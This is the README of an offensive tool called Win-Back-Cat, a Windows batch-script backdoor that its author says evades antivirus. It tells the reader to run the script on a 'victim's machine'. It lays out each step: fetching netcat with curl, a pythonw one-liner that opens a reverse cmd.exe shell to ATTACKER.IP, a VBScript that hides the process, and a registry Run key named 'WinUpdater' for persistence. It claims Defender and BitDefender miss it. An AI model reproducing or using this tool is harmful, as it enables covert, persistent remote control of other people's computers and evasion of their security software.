/win-back-cat

A fully undetected, hidden, persistent, reverse netcat shell backdoor for Windows.

Primary LanguageBatchfile

Win-Back-Cat

A fully undetected, hidden, persistent, reverse netcat shell backdoor for Windows.

Report Issue · Request Feature





Prerequisites:


  • You need to be logged in as an Administrator in order to be able to create a TCP listener with NetCat.

Python:

  • Python should be preinstalled on latest versions of Windows.
  • You can check by running python --version on command prompt.
  • If python is not installed, you will need to install it for this to work.

cURL:

  • If you have version 1803 or later of Windows 10, cURL is installed by default.
  • If you don't have cURL you will need to install it for this to work.
  • Otherwise find an alternative way to fetch nc.exe



Installation / How to use:

  • Very simple, download and execute (on victim's machine) the batch script: win-back-cat.bat.
  • Run a netcat listener on attacker machine (ATTACKER.IP) to get a shell back. Example: netcat -lvp 4445

Breakdown (What's in the script):


  • Move into Temp folder with Environment Variable %TEMP% as this helps with compatibility between Windows versions.

  • Fetch our Netcat version from repo with:
    curl https://raw.githubusercontent.com/RAF-87/win-back-cat/main/files/nc.exe > nc.exe


Why? - Reverse Shell


We need Linux version of Netcat compiled for Windows, instead of the common OpenBSD version.

The feature we need is this one:
  • -e filename: specify filename to exec after connect (use with caution). Connects STDIN and STDOUT to the specified file.

In our case the filename will be cmd.exe. This flag is missing on some versions for obvious Security reasons.


Pythonw - Undetected


  • Why pythonw.exe instead of python.exe?

pythonw.exe is a GUI app for launching GUI/no-UI-at-all scripts.

  • NO console window is opened.

  • Execution is asynchronous: -- When invoked from a console window, the script is merely launched and the prompt returns right away, whether the script is still running or not.

  • Windows trusts python. 🤷


pythonw -c "from subprocess import check_output; check_output('nc.exe ATTACKER.IP 4445 -e cmd.exe', shell=True);" >> wncat.bat

We use -c to run the script as one-liner from string. We export it onto a batch script for easier execution chained with the next step.


Visual Basic - Hidden


Dim WinScriptHost
Set WinScriptHost = CreateObject("WScript.Shell")
WinScriptHost.Run Chr(34) & "%TEMP%\wncat.bat" & Chr(34), 0
Set WinScriptHost = Nothing

The above script, will run our batch script as a separate process on the background without the user ever seeing anything. We need this to keep pythonw.exe alive in the background, otherwise using just the batch script we would need a command prompt window always open.


Windows Registry - Persistent


reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /f /v WinUpdater /t REG_SZ /d "%TEMP%\wncat.vbs"

We add our Visual Basic script to Run from the registry entry when Windows Boots up. So whenever we lose connection, the backdoor will reopen at the next reboot.


Tested on (Feel free to add to this list with a request):


  • OS: Microsoft Windows 10 Pro 10.0.18363 N/A Build 18363
  • Antivirus: Microsoft Defender, BitDefender



Note:

  • Using these combined tools, Windows or Any Antivirus cannot detect this backdoor.
  • Remember to edit ATTACKER.IP for the reverse shell to work.




Contact